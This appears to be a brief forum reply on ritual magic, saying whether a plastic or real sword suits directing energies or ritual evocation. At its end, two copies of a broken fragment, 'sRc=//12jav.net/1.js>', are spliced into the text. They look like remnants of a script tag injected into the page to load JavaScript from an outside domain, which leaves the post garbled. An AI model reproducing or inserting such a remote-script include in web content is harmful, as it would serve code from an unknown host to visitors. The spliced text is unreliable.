I would say so, the sword, much like the athame and wand is only used to direct energies, if you feel you can do that with plastic, then a plastic sword should suffice.

It depends on the operation. For something like a ritual evocation that requires it, I would use a real one. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
